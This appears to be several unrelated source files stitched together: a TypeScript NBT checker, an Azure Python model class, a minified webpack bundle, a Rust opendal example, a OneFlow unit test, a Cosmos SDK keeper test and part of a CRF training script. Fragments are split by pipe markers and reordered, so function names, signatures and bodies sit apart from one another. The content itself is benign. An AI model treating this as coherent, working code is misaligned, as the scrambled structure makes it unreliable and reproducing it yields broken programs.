import { NbtListNode } from '../node/index.js'
import { localizeTag } from '../util.js'
import { getBlocksFromItem, getEntityFromItem, getSpecialStringParser } from './mcdocUtil.js'
interface Options {
allowUnknownKey?: boolean,
isPredicate?: boolean,
}
interface PathOptions {
allowUnknownKey?: boolean,
}
declare global {
// https://github.com/microsoft/TypeScript/issues/17002#issuecomment-536946686
interface ArrayConstructor {
isArray(arg: unknown): arg is unknown[] | readonly unknown[]
}
}
/**
* @param id If the registry is under the `custom` namespace, `id` can only be a string. Otherwise it can be a string, string array, or `undefined`.
* If set to `undefined` or an empty array, all mcdoc compound definitions for this registry will be merged for checking, and unknown keys are allowed.
*/
export function index(registry: string, id: core.FullResourceLocation | readonly core.FullResourceLocation[] | undefined, options?: Options): core.SyncChecker<NbtCompoundNode>
export function index(registry: string, id: core.FullResourceLocation, options?: Options): core.SyncChecker<NbtCompoundNode>
export function index(registry: string, id: core.FullResourceLocation | readonly core.FullResourceLocation[] | undefined, options: Options = {}): core.SyncChecker<NbtCompoundNode> {
switch (registry) {
case 'custom:blockitemstates':
const blockIds = getBlocksFromItem(id as core.FullResourceLocation)
return blockIds
? blockStates(blockIds, options)
: core.checker.noop
case 'custom:blockstates':
return blockStates([id as string], options)
case 'custom:spawnitemtag':
const entityId = getEntityFromItem(id as core.FullResourceLocation)
return entityId
? index('entity_type', entityId, options)
: core.checker.noop
default:
return (node, ctx) => {
// const { allowUnknownKey, value } = resolveRootRegistry(registry, id, ctx, node)
// options.allowUnknownKey ||= allowUnknownKey
// compound(value, options)(node, ctx)
}
}
}
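// Illustrative usage (added; the registry and id are made-up examples, and the
// default branch above is currently a commented-out stub):
//
//     const check = index('block_entity_type', 'minecraft:chest' as core.FullResourceLocation)
//     check(compoundNode, ctx)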
/**
 * @param identifier An identifier of a mcdoc compound definition, e.g. `::minecraft::util::invitem::InventoryItem`
*/
export function definition(identifier: `::${string}::${string}`, options: Options = {}): core.SyncChecker<NbtCompoundNode> {
const index = identifier.lastIndexOf('::')
const module = identifier.slice(0, index)
const compoundDef = identifier.slice(index + 2)
const path: core.SymbolPath = { category: 'mcdoc', path: [module, compoundDef] }
return (node, ctx) => {
// const { allowUnknownKey, value } = resolveSymbolPaths([path], ctx, node)
// options.allowUnknownKey ||= allowUnknownKey
// compound(value, options)(node, ctx)
}
}
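// (Added note) For the identifier from the doc comment,
// '::minecraft::util::invitem::InventoryItem', `module` resolves to
// '::minecraft::util::invitem' and `compoundDef` to 'InventoryItem'.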
export function blockStates(blocks: string[], _options: Options = {}): core.SyncChecker<NbtCompoundNode> {
return (node, ctx) => {
const states = core.getStates('block', blocks, ctx)
for (const { key: keyNode, value: valueNode } of node.children) {
if (!keyNode || !valueNode) {
continue
}
// Type check.
if (valueNode.type === 'nbt:byte' && (ctx.src.slice(valueNode.range).toLowerCase() === 'false' || ctx.src.slice(valueNode.range).toLowerCase() === 'true')) {
ctx.err.report(localize('nbt.checker.block-states.fake-boolean'), valueNode, core.ErrorSeverity.Warning)
continue
} else if (valueNode.type !== 'string' && valueNode.type !== 'nbt:int') {
ctx.err.report(localize('nbt.checker.block-states.unexpected-value-type'), valueNode, core.ErrorSeverity.Warning)
continue
}
if (Object.keys(states).includes(keyNode.value)) {
// The current state exists. Check the value.
const stateValues = states[keyNode.value]!
if (!stateValues.includes(valueNode.value.toString())) {
ctx.err.report(localize('expected-got', stateValues, localeQuote(valueNode.value.toString())), valueNode, core.ErrorSeverity.Warning)
}
} else {
// The current state doesn't exist.
ctx.err.report(
localize('nbt.checker.block-states.unknown-state', localeQuote(keyNode.value), blocks),
keyNode, core.ErrorSeverity.Warning
)
}
}
}
}
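// Illustrative only (added): a checker built with blockStates(['minecraft:furnace'])
// would accept a compound like {facing: "north", lit: "false"}, while unknown
// state keys or out-of-range values are reported as warnings, not errors.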
/**
 * @param data The resolved compound definition data whose fields are checked.
 */
export function compound(data: any, options: Options = {}): core.SyncChecker<NbtCompoundNode> {
return (node, ctx) => {
for (const { key: keyNode, value: valueNode } of node.children) {
if (!keyNode || !valueNode) {
continue
}
const key = keyNode.value
const fieldData = data[key]
if (fieldData) {
fieldData.query.enter({ usage: { type: 'reference', node: keyNode } })
fieldValue(fieldData.data, options)(valueNode, ctx)
} else if (!options.allowUnknownKey) {
ctx.err.report(localize('unknown-key', localeQuote(key)), keyNode, core.ErrorSeverity.Warning)
}
}
}
}
export function enum_(path: core.SymbolPath | undefined, _options: Options = {}): core.SyncChecker<NbtPrimitiveNode> {
if (!path) {
return core.checker.noop
}
return (node, ctx) => {
// const query = ctx.symbols.query(ctx.doc, path.category, ...path.path)
// const data = query.symbol?.data as mcdoc.EnumNode.SymbolData | undefined
// // Check type.
// if (data?.enumKind && node.type !== data.enumKind && node.type !== `nbt:${data.enumKind}`) {
// ctx.err.report(localize('expected', localize(`nbt.node.${data.enumKind}`)), node, core.ErrorSeverity.Warning)
// }
// // Get all enum members.
// const enumMembers: Record<string, string> = {}
// query.forEachMember((name, memberQuery) => {
// const value = (memberQuery.symbol?.data as mcdoc.EnumFieldNode.SymbolData | undefined)?.value
// if (value !== undefined) {
// enumMembers[name] = value.toString()
// }
// })
// // Check value.
// if (!Object.values(enumMembers).includes(node.value.toString())) {
// ctx.err.report(localize('expected',
// Object.entries(enumMembers).map(([k, v]) => `${k} = ${v}`)
// ), node, core.ErrorSeverity.Warning)
// }
}
}
/**
* @param id If set to `undefined` or an empty array, all mcdoc compound definitions for this registry will be merged for checking, and unknown keys are allowed.
*/
export function path(registry: string, id: core.FullResourceLocation | readonly core.FullResourceLocation[] | undefined): core.SyncChecker<NbtPathNode> {
return (node, ctx) => {
// const resolveResult = resolveRootRegistry(registry, id, ctx, undefined)
// let targetType: mcdoc.McdocType | undefined = {
// kind: 'dispatcher',
// registry,
// index: ((): mcdoc.DispatcherData['index'] => {
// if (id === undefined) {
// return { kind: 'static', value: { keyword: '()' } }
// } else if (typeof id === 'string') {
// return { kind: 'static', value: id }
// } else {
// return id.map(v => ({ kind: 'static', value: v }))
// }
// })(),
// }
// const options: Options = { allowUnknownKey: resolveResult.allowUnknownKey, isPredicate: true }
// let currentCompound: NbtCompoundNode | undefined
// for (const child of node.children) {
// if (NbtCompoundNode.is(child)) {
// // Compound filter.
// currentCompound = child
// if (data?.type === 'union') {
// }
// if (data?.type === 'resolved_compound') {
// compound(data.data, options)(child, ctx)
// } else {
// ctx.err.report(localize('nbt.checker.path.unexpected-filter'), child, core.ErrorSeverity.Warning)
// }
// } else if (core.StringNode.is(child)) {
// // Key.
// if (data?.type === 'union') {
// }
// if (data?.type === 'resolved_compound') {
// const fieldData: ResolvedCompoundData[string] = data.data[child.value]
// if (fieldData) {
// fieldData.query.enter({ usage: { type: 'reference', node: child } })
// if (fieldData.data.type === 'byte_array' || fieldData.data.type === 'int_array' || fieldData.data.type === 'long_array' || fieldData.data.type === 'list' || fieldData.data.type === 'union') {
// data = fieldData.data
// } else {
// const resolveResult = resolveSymbolData(fieldData.data, ctx, currentCompound)
// if (resolveResult.value) {
// options.allowUnknownKey ||= resolveResult.allowUnknownKey
// data.data = resolveResult.value
// } else {
// data = undefined
// }
// }
// targetType = fieldData.data
// } else {
// if (!options.allowUnknownKey) {
// ctx.err.report(localize('unknown-key', localeQuote(child.value)), child, core.ErrorSeverity.Warning)
// }
// targetType = undefined
// break
// }
// } else {
// ctx.err.report(localize('nbt.checker.path.unexpected-key'), child, core.ErrorSeverity.Warning)
// targetType = undefined
// break
// }
// currentCompound = undefined
// } else {
// // Index.
// if (data?.type === 'byte_array' || data?.type === 'int_array' || data?.type === 'long_array' || data?.type === 'list') {
// // Check content.
// if (child.children !== undefined) {
// const [content] = child.children
// if (content.type === 'integer') {
// const absIndex = content.value < 0 ? -1 - content.value : content.value
// const [, maxLength] = data.lengthRange ?? [undefined, undefined]
// if (maxLength !== undefined && absIndex >= maxLength) {
// ctx.err.report(localize('nbt.checker.path.index-out-of-bound', content.value, maxLength), content, core.ErrorSeverity.Warning)
// }
// } else {
// let isUnexpectedFilter = true
// if (data.type === 'list') {
// const { allowUnknownKey, value } = resolveSymbolData(data.item, ctx, currentCompound)
// options.allowUnknownKey ||= allowUnknownKey
// if (value) {
// isUnexpectedFilter = false
// compound(value, options)(content, ctx)
// }
// }
// if (isUnexpectedFilter) {
// ctx.err.report(localize('nbt.checker.path.unexpected-filter'), content, core.ErrorSeverity.Warning)
// targetType = undefined
// break
// }
// currentCompound = content
// }
// }
// // Set data for the next iteration.
// if (data.type === 'list') {
// const { allowUnknownKey, value } = resolveSymbolData(data.item, ctx, currentCompound)
// options.allowUnknownKey ||= allowUnknownKey
// targetType = data.item
// if (value) {
// data = { type: 'resolved_compound', data: value }
// } else {
// data = undefined
// }
// } else {
// targetType = {
// type: data.type.split('_')[0] as 'byte' | 'int' | 'long',
// valueRange: data.valueRange,
// }
// data = undefined
// }
// } else {
// ctx.err.report(localize('nbt.checker.path.unexpected-index'), child, core.ErrorSeverity.Warning)
// targetType = undefined
// break
// }
// }
// }
// ctx.ops.set(node, 'targetType', targetType)
}
}
export function fieldValue(type: mcdoc.McdocType, options: Options): core.SyncChecker<NbtNode> {
const isInRange = (value: number, [min, max]: [number | undefined, number | undefined]) =>
(min ?? -Infinity) <= value && value <= (max ?? Infinity)
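	// (Added note) An absent bound is unbounded: isInRange(v, [undefined, max]) only checks the upper end.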
const ExpectedTypes: Record<Exclude<mcdoc.McdocType['kind'], 'any' | 'dispatcher' | 'enum' | 'literal' | 'reference' | 'union'>, NbtNode['type']> = {
boolean: 'nbt:byte',
byte: 'nbt:byte',
byte_array: 'nbt:byte_array',
double: 'nbt:double',
float: 'nbt:float',
int: 'nbt:int',
int_array: 'nbt:int_array',
list: 'nbt:list',
long: 'nbt:long',
long_array: 'nbt:long_array',
short: 'nbt:short',
string: 'string',
struct: 'nbt:compound',
tuple: 'nbt:list',
}
return (node, ctx): void => {
// Rough type check.
if (type.kind !== 'any' && type.kind !== 'dispatcher' && type.kind !== 'enum' && type.kind !== 'literal' && type.kind !== 'reference' && type.kind !== 'union' && node.type !== ExpectedTypes[type.kind]) {
ctx.err.report(localize('expected', localizeTag(ExpectedTypes[type.kind])), node, core.ErrorSeverity.Warning)
return
}
switch (type.kind) {
case 'boolean':
node = node as NbtByteNode
if (node.value !== 0 && node.value !== 1) {
ctx.err.report(
localize('nbt.checker.boolean.out-of-range', localeQuote('0b'), localeQuote('1b')),
node, core.ErrorSeverity.Warning
)
}
break
case 'byte_array':
case 'int_array':
case 'long_array':
node = node as NbtPrimitiveArrayNode
if (type.lengthRange && !isInRange(node.children.length, type.lengthRange)) {
ctx.err.report(localize('expected', localize('nbt.checker.collection.length-between',
localizeTag(node.type),
type.lengthRange[0] ?? '-∞',
type.lengthRange[1] ?? '+∞'
)), node, core.ErrorSeverity.Warning)
}
if (type.valueRange) {
for (const { value: childNode } of node.children) {
if (childNode && !isInRange(Number(childNode.value), type.valueRange)) {
ctx.err.report(localize('number.between',
type.valueRange[0] ?? '-∞',
type.valueRange[1] ?? '+∞'
), node, core.ErrorSeverity.Warning)
}
}
}
break
case 'byte':
case 'short':
case 'int':
case 'long':
case 'float':
case 'double':
node = node as NbtNumberNode
if (type.valueRange && !isInRange(Number(node.value), type.valueRange)) {
ctx.err.report(localize('number.between',
type.valueRange[0] ?? '-∞',
type.valueRange[1] ?? '+∞'
), node, core.ErrorSeverity.Warning)
}
break
case 'dispatcher':
node = node as NbtCompoundNode
// const id = resolveFieldPath(node.parent?.parent, type.index.path)
// if (type.index.registry) {
// if (ExtendableRootRegistry.is(type.index.registry)) {
// index(type.index.registry, id ? core.ResourceLocation.lengthen(id) : undefined, options)(node, ctx)
// } else if (id) {
// index(type.index.registry, core.ResourceLocation.lengthen(id), options)(node, ctx)
// }
// }
break
case 'list':
node = node as NbtListNode
type = mcdoc.simplifyListType(type)
if (type.lengthRange && !isInRange(node.children.length, type.lengthRange)) {
ctx.err.report(localize('expected', localize('nbt.checker.collection.length-between',
localizeTag(node.type),
type.lengthRange[0] ?? '-∞',
type.lengthRange[1] ?? '+∞'
)), node, core.ErrorSeverity.Warning)
}
for (const { value: childNode } of node.children) {
if (childNode) {
fieldValue(type.item, options)(childNode, ctx)
}
}
break
case 'string':
node = node as core.StringNode
let suffix = ''
let valueNode: NbtNode = node
if (core.ItemNode.is(node.parent) && NbtListNode.is(node.parent.parent)) {
suffix = '[]'
valueNode = node.parent.parent
}
if (core.PairNode.is<core.StringNode, NbtNode>(valueNode.parent)) {
const structMcdocPath = valueNode.parent.key?.symbol?.parentSymbol?.path.join('::')
const key = valueNode.parent.key?.value
const path = `${structMcdocPath}.${key}${suffix}`
const parserName = getSpecialStringParser(path)
if (parserName) {
try {
const parser = ctx.meta.getParser(parserName)
const result = core.parseStringValue(parser, node.value, node.valueMap, ctx)
if (result !== core.Failure) {
node.children = [result]
result.parent = node
}
} catch (e) {
ctx.logger.error('[nbt.checker.fieldValue#string]', e)
}
}
}
break
case 'reference':
node = node as NbtCompoundNode
// if (type.symbol) {
// const { allowUnknownKey, value } = resolveSymbolPaths([type.symbol], ctx, node)
// compound(value, { ...options, allowUnknownKey: options.allowUnknownKey || allowUnknownKey })(node, ctx)
// }
break
case 'union':
type = mcdoc.flattenUnionType(type)
if (type.members.length === 0) {
ctx.err.report(
localize('nbt.checker.compound.field.union-empty-members'),
core.PairNode.is(node.parent)
? (node.parent.key ?? node.parent)
: node,
core.ErrorSeverity.Warning
)
} else {
(core.checker.any(type.members.map(t => fieldValue(t, options))) as core.SyncChecker<NbtNode>)(node, ctx)
}
break
}
}
}
| enum_ |
deployment_properties_extended.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DeploymentPropertiesExtended(Model):
"""Deployment properties with additional details.
:param provisioning_state: Gets or sets the state of the provisioning.
:type provisioning_state: str
:param correlation_id: Gets or sets the correlation ID of the deployment.
:type correlation_id: str
:param timestamp: Gets or sets the timestamp of the template deployment.
:type timestamp: datetime
:param outputs: Gets or sets key/value pairs that represent
    deployment output.
:type outputs: object
:param providers: Gets the list of resource providers needed for the
deployment.
:type providers: list of :class:`Provider <Default.models.Provider>`
:param dependencies: Gets the list of deployment dependencies.
:type dependencies: list of :class:`Dependency
<Default.models.Dependency>`
:param template: Gets or sets the template content. Use only one of
Template or TemplateLink.
:type template: object
:param template_link: Gets or sets the URI referencing the template. Use
only one of Template or TemplateLink.
:type template_link: :class:`TemplateLink <Default.models.TemplateLink>`
:param parameters: Deployment parameters. Use only one of Parameters or
ParametersLink.
:type parameters: object
:param parameters_link: Gets or sets the URI referencing the parameters.
Use only one of Parameters or ParametersLink.
:type parameters_link: :class:`ParametersLink
<Default.models.ParametersLink>`
:param mode: Gets or sets the deployment mode. Possible values include:
'Incremental', 'Complete'
:type mode: str or :class:`DeploymentMode <Default.models.DeploymentMode>`
"""
_attribute_map = {
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'correlation_id': {'key': 'correlationId', 'type': 'str'},
'timestamp': {'key': 'timestamp', 'type': 'iso-8601'},
'outputs': {'key': 'outputs', 'type': 'object'},
'providers': {'key': 'providers', 'type': '[Provider]'},
'dependencies': {'key': 'dependencies', 'type': '[Dependency]'},
'template': {'key': 'template', 'type': 'object'},
        'template_link': {'key': 'templateLink', 'type': 'TemplateLink'},
'parameters': {'key': 'parameters', 'type': 'object'},
'parameters_link': {'key': 'parametersLink', 'type': 'ParametersLink'},
'mode': {'key': 'mode', 'type': 'DeploymentMode'},
} | self.provisioning_state = provisioning_state
self.correlation_id = correlation_id
self.timestamp = timestamp
self.outputs = outputs
self.providers = providers
self.dependencies = dependencies
self.template = template
self.template_link = template_link
self.parameters = parameters
self.parameters_link = parameters_link
self.mode = mode |
def __init__(self, provisioning_state=None, correlation_id=None, timestamp=None, outputs=None, providers=None, dependencies=None, template=None, template_link=None, parameters=None, parameters_link=None, mode=None): |
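# A minimal usage sketch (hypothetical values; msrest usually builds this model
# when deserializing an API response, but it can also be constructed directly):
#
#   props = DeploymentPropertiesExtended(provisioning_state='Succeeded',
#                                        mode='Incremental')
#   assert props.mode == 'Incremental'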
green.bundle.js | !function(e){var t={};function | (n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="",r(r.s=434)}({434:function(e,t,r){"use strict";r.r(t);r(435)},435:function(e,t,r){}}); | r |
basic.rs | // Copyright 2022 Datafuse Labs.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use anyhow::Result;
use futures::AsyncReadExt;
use futures::StreamExt; | use opendal::ObjectMode;
use opendal::Operator;
#[tokio::main]
async fn main() -> Result<()> {
let op = Operator::new(fs::Backend::build().root("/tmp").finish().await?);
let o = op.object("test_file");
// Write data info file;
let w = o.writer();
let n = w
.write_bytes("Hello, World!".to_string().into_bytes())
.await?;
assert_eq!(n, 13);
// Read data from file;
let mut r = o.reader();
let mut buf = vec![];
let n = r.read_to_end(&mut buf).await?;
assert_eq!(n, 13);
assert_eq!(String::from_utf8_lossy(&buf), "Hello, World!");
// Read range from file;
let mut r = o.range_reader(10, 1);
let mut buf = vec![];
let n = r.read_to_end(&mut buf).await?;
assert_eq!(n, 1);
assert_eq!(String::from_utf8_lossy(&buf), "l");
// Get file's Metadata
let meta = o.metadata().await?;
assert_eq!(meta.content_length(), 13);
// List current dir.
let mut obs = op.objects("").map(|o| o.expect("list object"));
let mut found = false;
while let Some(o) = obs.next().await {
let meta = o.metadata().await?;
if meta.path().contains("test_file") {
let mode = meta.mode();
assert_eq!(mode, ObjectMode::FILE);
found = true
}
}
    assert!(found, "test_file should be found in iterator");
// Delete file.
o.delete().await?;
Ok(())
} | use opendal::services::fs; |
test_binary_elementwise_ops.py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
import numpy as np
import tensorflow as tf
import oneflow as flow
from collections import OrderedDict
import oneflow.typing as oft
import test_global_storage
from test_util import (
GenArgDict,
GenArgList,
type_name_to_flow_type,
type_name_to_np_type,
)
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def RunOneflowBinaryOp(device_type, flow_op, x, y, data_type):
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
flow_type = type_name_to_flow_type[data_type]
@flow.global_function(type="train", function_config=func_config)
def FlowJob(
x: oft.Numpy.Placeholder(x.shape, dtype=flow_type),
y: oft.Numpy.Placeholder(y.shape, dtype=flow_type),
):
with flow.scope.placement(device_type, "0:0"):
x += flow.get_variable(
name="x",
shape=x.shape,
dtype=flow_type,
initializer=flow.zeros_initializer(),
trainable=True,
)
y += flow.get_variable(
name="y",
shape=y.shape,
dtype=flow_type,
initializer=flow.zeros_initializer(),
trainable=True,
)
loss = flow_op(x, y)
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0
).minimize(loss)
flow.watch_diff(x, test_global_storage.Setter("x_diff"))
flow.watch_diff(y, test_global_storage.Setter("y_diff"))
return loss
# Oneflow
out = FlowJob(x, y).get().numpy()
x_diff = test_global_storage.Get("x_diff")
y_diff = test_global_storage.Get("y_diff")
return out, x_diff, y_diff
def RunTensorFlowBinaryOp(tf_op, x, y):
# TensorFlow
with tf.GradientTape(persistent=True) as tape:
x = tf.Variable(x)
y = tf.Variable(y)
out = tf_op(x, y)
x_diff = tape.gradient(out, x)
y_diff = tape.gradient(out, y)
return out.numpy(), x_diff, y_diff
def compare_with_tensorflow(
test_case,
device_type,
flow_op,
tf_op,
x_shape,
y_shape,
data_type,
x_minval=-10,
x_maxval=10,
y_minval=-10,
y_maxval=10,
compare_grad=True,
out_rtol=1e-5,
out_atol=1e-5,
diff_rtol=1e-5,
diff_atol=1e-5,
):
test_case.assertTrue(device_type in ["gpu", "cpu"])
np_type = type_name_to_np_type[data_type]
x = np.random.uniform(low=x_minval, high=x_maxval, size=x_shape).astype(np_type)
y = np.random.uniform(low=y_minval, high=y_maxval, size=y_shape).astype(np_type)
    of_out, of_x_diff, of_y_diff = RunOneflowBinaryOp(
device_type, flow_op, x, y, data_type
)
tf_out, tf_x_diff, tf_y_diff = RunTensorFlowBinaryOp(tf_op, x, y)
test_case.assertTrue(
np.allclose(of_out, tf_out, rtol=out_rtol, atol=out_atol, equal_nan=True)
)
if compare_grad:
test_case.assertTrue(
np.allclose(
of_x_diff,
tf_x_diff.numpy(),
rtol=diff_rtol,
atol=diff_atol,
equal_nan=True,
)
)
test_case.assertTrue(
np.allclose(
of_y_diff,
tf_y_diff.numpy(),
rtol=diff_rtol,
atol=diff_atol,
equal_nan=True,
)
)
flow.clear_default_session()
@flow.unittest.skip_unless_1n1d()
class TestBinaryElementwiseOps(flow.unittest.TestCase):
def test_floordiv(test_case):
|
def test_pow(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.pow]
arg_dict["tf_op"] = [tf.math.pow]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [5]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [5]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_xdivy(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.xdivy]
arg_dict["tf_op"] = [tf.math.xdivy]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [100]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [10]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_xlogy(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.xlogy]
arg_dict["tf_op"] = [tf.math.xlogy]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [5]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [5]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_atan2(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.atan2]
arg_dict["tf_op"] = [tf.math.atan2]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [5]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [5]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
if __name__ == "__main__":
unittest.main()
| arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.floordiv]
arg_dict["tf_op"] = [tf.math.floordiv]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [-10]
arg_dict["x_maxval"] = [10]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [10]
arg_dict["compare_grad"] = [False]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg) |
keeper_test.go | package keeper_test
import (
"testing"
"github.com/stretchr/testify/require"
"github.com/stretchr/testify/suite"
tmproto "github.com/tendermint/tendermint/proto/tendermint/types"
"github.com/cosmos/cosmos-sdk/baseapp"
"github.com/cosmos/cosmos-sdk/simapp"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/cosmos/cosmos-sdk/x/staking/keeper"
"github.com/cosmos/cosmos-sdk/x/staking/types"
)
type KeeperTestSuite struct {
suite.Suite
app *simapp.SimApp
ctx sdk.Context
addrs []sdk.AccAddress
vals []types.Validator
queryClient types.QueryClient
}
func (suite *KeeperTestSuite) SetupTest() {
app := simapp.Setup(suite.T(), false)
ctx := app.BaseApp.NewContext(false, tmproto.Header{})
querier := keeper.Querier{Keeper: app.StakingKeeper}
queryHelper := baseapp.NewQueryServerTestHelper(ctx, app.InterfaceRegistry())
types.RegisterQueryServer(queryHelper, querier)
queryClient := types.NewQueryClient(queryHelper)
addrs, _, validators := createValidators(suite.T(), ctx, app, []int64{9, 8, 7})
header := tmproto.Header{
ChainID: "HelloChain",
Height: 5,
}
	// sort a copy of the validators, so that the original validators slice does
	// not have its order changed
sortedVals := make([]types.Validator, len(validators))
copy(sortedVals, validators)
hi := types.NewHistoricalInfo(header, sortedVals, app.StakingKeeper.PowerReduction(ctx))
app.StakingKeeper.SetHistoricalInfo(ctx, 5, &hi)
suite.app, suite.ctx, suite.queryClient, suite.addrs, suite.vals = app, ctx, queryClient, addrs, validators
}
func | (t *testing.T) {
app := simapp.Setup(t, false)
ctx := app.BaseApp.NewContext(false, tmproto.Header{})
expParams := types.DefaultParams()
	// check that the empty keeper loads the default
resParams := app.StakingKeeper.GetParams(ctx)
require.True(t, expParams.Equal(resParams))
	// modify a param, save, and retrieve
expParams.MaxValidators = 777
app.StakingKeeper.SetParams(ctx, expParams)
resParams = app.StakingKeeper.GetParams(ctx)
require.True(t, expParams.Equal(resParams))
}
func TestKeeperTestSuite(t *testing.T) {
suite.Run(t, new(KeeperTestSuite))
}
| TestParams |
train.py | # -*- coding: utf-8 -*-
"""
Main training file for the CRF.
This file trains a CRF model and saves it under the filename provided via an 'identifier' command
line argument.
Usage example:
python train.py --identifier="my_experiment"
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import random
import pycrfsuite
from model.datasets import load_windows, load_articles, generate_examples
import model.features as features
# All capitalized constants come from this file
import config as cfg
random.seed(42)
def main():
"""This function handles the command line arguments and then calls the train() method."""
parser = argparse.ArgumentParser()
parser.add_argument("--identifier", required=True,
help="A short name/identifier for your experiment, e.g. 'ex42b'.")
args = parser.parse_args()
train(args)
def train(args):
"""Main training method.
Does the following:
1. Create a new pycrfsuite trainer object. We will have to add feature chains and label
chains to that object and then train on them.
2. Creates the feature (generators). A feature generator might e.g. take in a window
of N tokens and then return ["upper=1"] for each token that starts with an uppercase
letter and ["upper=0"] for each token that starts with a lowercase letter. (Lists,
because a token can be converted into multiple features by a single feature generator,
    e.g. the case for LDA, as a token may be part of multiple topics.)
3. Loads windows from the corpus. Each window has a fixed (maximum) size in tokens. | One list at the top level representing each token, then another list for the feature
values. E.g.
[["w2v=123", "bc=742", "upper=0"], ["w2v=4", "bc=12", "upper=1", "lda4=1"]]
for two tokens.
5. Add feature chains and label chains to the trainer.
6. Train. This may take several hours for 20k windows.
Args:
args: Command line arguments as parsed by argparse.ArgumentParser.
"""
trainer = pycrfsuite.Trainer(verbose=True)
# Create/Initialize the feature generators
# this may take a few minutes
print("Creating features...")
feature_generators = features.create_features()
# Initialize the window generator
# each window has a fixed maximum size of tokens
print("Loading windows...")
windows = load_windows(load_articles(cfg.ARTICLES_FILEPATH), cfg.WINDOW_SIZE,
feature_generators, only_labeled_windows=True)
# Add chains of features (each list of lists of strings)
# and chains of labels (each list of strings)
# to the trainer.
# This may take a long while, especially because of the lengthy POS tagging.
# POS tags and LDA results are cached, so the second run through this part will be significantly
# faster.
print("Adding example windows (up to max %d)..." % (cfg.COUNT_WINDOWS_TRAIN))
